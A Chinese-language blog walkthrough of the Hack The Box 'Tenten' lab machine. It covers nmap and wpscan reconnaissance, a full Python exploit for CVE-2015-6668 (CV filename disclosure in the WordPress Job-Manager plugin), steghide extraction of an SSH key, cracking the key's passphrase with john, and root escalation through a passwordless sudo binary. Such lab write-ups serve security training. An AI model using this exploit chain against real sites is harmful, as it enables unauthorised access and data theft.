目录

Hack The Box —— Tenten

Hack The Box —— Tenten

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905155646.png-water_print

信息搜集

nmap

1
nmap -T4 -A -v 10.10.10.6

发现服务器开了 22 端口和 80 端口浏览器访问 http 服务,发现 wordpress 站点。

漏洞扫描

利用 wpscan 工具扫描一波 wordpress 站的信息:

1
wpscan --enumerate t --enumerate p --enumerate u --url=http://10.10.10.10/

发现用户名: https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905160043.png-water_print

插件漏洞: https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905160104.png-water_print

漏洞利用

搜索 Job-Manager 相关漏洞,发现,用户可以利用该插件可以上传 CV。由于 wordpress 上传的文件存放在 upload/year/month/filename 下,因此可以爆破出上传的 CV 文件,从而造成信息泄漏。

首先访问 Jobs Listinghttps://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905161223.png-water_print

apply now 下获取 job 详细信息: https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905161402.png-water_print

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905161501.png-water_print

更改 url 中的 number 值,可以得到其它的 JOB APPLICATION, 使用如下命令,枚举 job titlehttps://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905161711.png-water_print

发现 HackerAccessGranted title,尝试使用 exp 进行用户上传 cv 的枚举:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests

print """  
CVE-2015-6668  
Title: CV filename disclosure on Job-Manager WP Plugin  
Author: Evangelos Mourikis  
Blog: https://vagmour.eu  
Plugin URL: http://www.wp-jobmanager.com  
Versions: <=0.7.25  
"""  
website = raw_input('Enter a vulnerable website: ')  
filename = raw_input('Enter a file name: ')

filename2 = filename.replace(" ", "-")

for year in range(2016,2019):  
    for i in range(1,13):
        for extension in {'php','html','pdf','png','gif','jpg','jpeg'}:
            URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
            print URL
            req = requests.get(URL)
            if req.status_code==200:
                print "[+] URL of CV found! " + URL

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905161950.png-water_print

发现如下敏感文件: https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905162035.png-water_print

访问,得到一张图片。 https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905162105.jpg-water_print

猜测图片隐写,使用 steghide extract -sf HackerAccessGranted.jpg,得到 id_rsa 文件。

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905162242.png-water_print

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905162345.png-water_print

打开 id_rsa 文件,发现该文件被加密: https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905162314.png-water_print

使用 ssh2john 脚本文件将加密的内容转化为 john 可以破解的文件

1
python2 ssh2john id_rsa > ssh_login

得到: https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905162833.png-water_print

使用 john 进行密码破解:

1
john ssh_login --wordlist=rockyou.txt

得到 id_rsa 的密码:superpassword

尝试登录服务器:

1
ssh -i id_rsa takis@10.10.10.10

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905163056.png-water_print

得到第一个 flag

尝试进入 root 目录,发现权限不足。 使用 sudo -l 命令,查看无需密码课执行的命令: https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905163351.png-water_print

发现 /bin/fuckin 文件,查看文件内容: https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905163512.png-water_print

执行:sudo /bin/fuckin /bin/bash,即可获得 root 权限: https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190905163635.png-water_print